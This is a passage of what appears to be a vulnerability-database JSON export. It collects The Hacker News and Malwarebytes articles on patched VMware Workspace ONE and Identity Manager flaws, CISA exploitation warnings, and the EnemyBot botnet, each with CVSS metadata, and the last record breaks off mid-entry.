Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-21T14:56:00", "type": "thn", "title": "Multiple Campaigns Exploit VMware Vulnerability to Deploy Crypto Miners and Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31805", "CVE-2022-22954"], "modified": "2022-10-22T05:34:12", "id": "THN:06F5ECB1217B8E9B20CB0AC447D63E26", "href": "https://thehackernews.com/2022/10/multiple-campaigns-exploit-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-03T09:59:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTOrIOL2CttCsOisd2VA2-gW84X4_vjRN0VeeVboCjatIhEmWgIzGhZkYZXyQiW0ewz7zHcj_3EwSdqRnAEPwbveJ6sP9b5SJiFO0gUhzcDnZ9z_5ucDfKC7Z8zpknqBWNLKePyknCnTPVaEsOxab4oLFhAcLQshylLe2hoOkVC6gAmgTmPpUk5AgR/s728-e100/vmware.jpg>)\n\nVirtualization services provider VMware on Tuesday 
shipped updates to [address 10 security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.\n\nThe issues, tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8), impact VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nThe most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative rights.\n\nAlso resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgI_LeUTMPRZAt45PycKydjnK35qzJ1vbQrYZzduBTK3pwXBSzoILVNO-NRrPV10q1CViYba9n3BFSkwCE3OiyPlBjFFKGfCsIsJrAb51zEv4pjpbI2p48W8c3Mtjx69-XrpwGlGorezClU2y2S8TfiA-6eMBO24eui8doqA0Tk1PmsxjAItUOG82gX/s728-e100/flaws.jpg>)\n\nElsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.\n\nRounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to \"root,\" a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).\n\nWhile successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.\n\nVMware said it's not 
aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to [apply the patches immediately](<https://core.vmware.com/vmsa-2022-0021-questions-answers-faq>) to mitigate potential threats.\n", "cvss3": {}, "published": "2022-08-03T04:49:00", "type": "thn", "title": "VMware Releases Patches for Several New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T08:25:40", "id": "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "href": "https://thehackernews.com/2022/08/vmware-releases-patches-for-several-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-19T06:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjdo6Qyq6Cl_mWJDYZnviXPjIVW9fan7pRXKUukqzb6iq367-LOSVGv_1CUI04hyzkbzuY1-Bv4tKpxA3yDFc8Lo3BByd9UeB1zp9_Ge2Nlm5rKaqo8--9ilJOe_g_LpqeR3wzE9w91bZVrW48gh5XKFDhi4GGN9cpqc_6kGH6bHgEBLLpDdhoC2YpE/s728-e100/vmware.jpg>)\n\nVMware has issued patches to contain [two security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.\n\nThe first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.\n\nCVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local 
privilege escalation that could enable an attacker with local access to elevate privileges to the \"root\" user on vulnerable virtual appliances.\n\n\"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments,\" VMware [said](<https://core.vmware.com/vmsa-2022-0014-questions-answers-faq>).\n\nThe disclosure follows a [warning](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>) from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 \u2014 two other VMware flaws that were [fixed](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) [early last month](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) \u2014 separately and in combination.\n\n\"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user,\" it said. \"The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. 
With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.\"\n\nOn top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.\n\nIT security company Barracuda Networks, in an [independent report](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>), said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaPrXn1XfHadatV2N4b_itqqrI2wEGgb0BlVgiL8DoxQNoPKFMnfIxeMPf_0BQY1aIj6xJ6Jzp3pdwxrAImifZhB6dWwKp3rkMKVhRr9ZN2DzQWx3gXATGFHXy-Y4ER1Kuj-ZLESMZcPE-O8zmbk7kkpS1n3OzP2U2I6LDrIX-56SfkimD7ARb8lWh/s728-e100/vmware.jpg>)\n\nMore than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. (6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).\n\nSome of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the [Mirai](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) distributed denial-of-service (DDoS) malware.\n\nThe issues have also prompted CISA to issue an [emergency directive](<https://www.cisa.gov/emergency-directive-22-03>) urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. 
EDT on May 23 or disconnect the devices from their networks.\n\n\"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products,\" the agency said.\n\nThe patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product ([CVE-2022-22966](<https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html>)) that could be weaponized to launch remote code execution attacks.\n\n### CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388\n\nIt's not just VMware that's under fire. The agency has also released a follow-up advisory with regards to the active exploitation of [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.\n\nCISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) it expects to \"see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T05:48:00", "type": "thn", "title": "VMware Releases Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22966", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T05:48:33", "id": "THN:8E366D56AB2756B4DE53AEEA90675132", "href": "https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgH2zt4g1_P1xvK8Wi8KSMw9vIPPJtky5piaCiNK-rjkmE-7yuBZYiKkwAk7wlIoTWl-rZNqoM03K9UoNLWQBA6OjwSGjfbBoKY0KYD9kDaNKMXqbGugujnFHkWdeBlPriwsgVx5WtbGKg5Y3L-3k2nrqyj9liy7jKHR8dHDgirdUlIT1MLoi-UtdMZ/s728-e100/vmware.jpg>)\n\nVMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks.\n\nTracked from [CVE-2022-22954 to CVE-2022-22961](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nFive of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute.\n\nThe list of flaws is below -\n\n * **CVE-2022-22954** (CVSS score: 9.8) - Server-side template injection remote code execution vulnerability affecting VMware Workspace ONE Access and Identity Manager\n * **CVE-2022-22955 & CVE-2022-22956** (CVSS scores: 9.8) - OAuth2 ACS authentication bypass vulnerabilities in VMware Workspace ONE Access\n * **CVE-2022-22957 & CVE-2022-22958** (CVSS scores: 9.1) - JDBC injection remote code execution vulnerabilities in VMware Workspace ONE Access, Identity Manager, and vRealize Automation\n * **CVE-2022-22959** (CVSS score: 8.8) - Cross-site request forgery (CSRF) vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation\n * **CVE-2022-22960** (CVSS score: 7.8) - Local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation, and\n * **CVE-2022-22961** (CVSS score: 5.3) - Information disclosure vulnerability impacting VMware Workspace ONE Access, Identity Manager and vRealize 
Automation\n\nSuccessful exploitation of the aforementioned weaknesses could allow a malicious actor to escalate privileges to root user, gain access to the hostnames of the target systems, and remotely execute arbitrary code, effectively allowing full takeover.\n\n\"This critical vulnerability should be patched or mitigated immediately,\" VMware [said](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq>) in an alert. \"The ramifications of this vulnerability are serious.\"\n\nWhile the virtualization services provider noted that it has not seen any evidence that the vulnerabilities have been exploited in the wild, it's highly recommended to apply the patches to remove potential threats.\n\n\"Workarounds, while convenient, do not remove the vulnerabilities, and may introduce additional complexities that patching would not,\" the company cautioned.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T05:49:00", "type": "thn", "title": "VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2022-04-07T05:49:08", "id": "THN:3FE4961C11E2DB2B8015ACFEF6CDFB9B", "href": "https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T05:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBs1v_UBB96XLwx1fhDB24ftZm1R62Ku1955ZGISzLISuse4t_qn4dHBN2z84qTMZzGt97CTTgScoGr9eBOu00Vwlfa9yOw-qRRAXiPJRy7VQLYUNELMAusESXMjCUTEAFj0EPHqLPRnwAtLbNPQLys8F4CDIVvGrmmJqXok_igJowzJPNKzVrBOoL/s728-e100/code.jpg>)\n\nA nascent Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).\n\n\"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\" AT&T Alien Labs [said](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a technical write-up published last week. 
\"Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.\"\n\nFirst disclosed by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March and later by [Fortinet](<https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html>), Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.\n\nEnemybot, which is capable of carrying out [DDoS attacks](<https://en.wikipedia.org/wiki/Denial-of-service_attack>), draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -\n\n * A Python module to download dependencies and compile the malware for different OS architectures\n * The core botnet section\n * An obfuscation segment designed to encode and decode the malware's strings, and\n * A command-and-control functionality to receive attack commands and fetch additional payloads\n\n\"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,\" the researchers said, pointing to a new \"adb_infect\" function. 
ADB refers to [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>), a command-line utility used to communicate with an Android device.\n\nAlso incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgpc96pQMDAAqWfH85fEsGBf1xrj8m3a3gH9va1i7k-HmTzikPIzZGImKevqb3wxvW1wxFjhDs9J_Ii1xzSUdJpYaornlzqm5NOU8GCTzKMJoo7Tqy4kafPPjw7fLOUT5fXucBVfCUjMjn5-J2dr2U9992Sbsa-mLLWhevc7-l6Uqf_7AeQGz1sDvTF/s728-e100/goip.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoCVQLY8Ozew4EQYe8whasxaFqzk8QnTX4P9wTrhC5kmGUuAW_20VD-gaPJ2Y9A-2hcLTSgVGc9UP7K9407c24ypTfJHRJvPoem7rVVTe50pMIY4MB-3dCwJ3rqYVc6BjGkU7_AGfuC5xLyp9rDp0g1R06cvFDa-Mxzow3EU9txlmSQAXEwuoIZQKn/s728-e100/log4j.jpg>)\n\nBesides the [Log4Shell vulnerabilities](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>)), and F5 BIG-IP ([CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>)) as well as weaknesses in WordPress plugins like Video Synchro PDF.\n\nOther weaponized security shortcomings are below -\n\n * [**CVE-2022-22947**](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>) (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway\n * [**CVE-2021-4039**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4039>) (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware\n * [**CVE-2022-25075**](<https://nvd.nist.gov/vuln/detail/CVE-2022-25075>) (CVSS score: 9.8) - 
A command injection vulnerability in TOTOLink A3000RU wireless router\n * [**CVE-2021-36356**](<https://nvd.nist.gov/vuln/detail/CVE-2021-36356>) (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware\n * [**CVE-2021-35064**](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>) (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare\n * [**CVE-2020-7961**](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>) (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal\n\nWhat's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. \"I assume no responsibility for any damages caused by this program,\" the project's README file [reads](<https://github.com/freakanonymous/enemy>). \"This is posted under Apache license and is also considered art.\"\n\n\"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.\n\n\"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-30T10:30:00", "type": "thn", "title": "EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7961", "CVE-2021-35064", "CVE-2021-36356", "CVE-2021-4039", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-22954", "CVE-2022-25075"], "modified": "2022-05-31T04:11:39", "id": "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "href": "https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a 
[CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. 
These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!\n\nThe post [Update now! 
VMWare patches critical vulnerabilities in several products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. 
A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 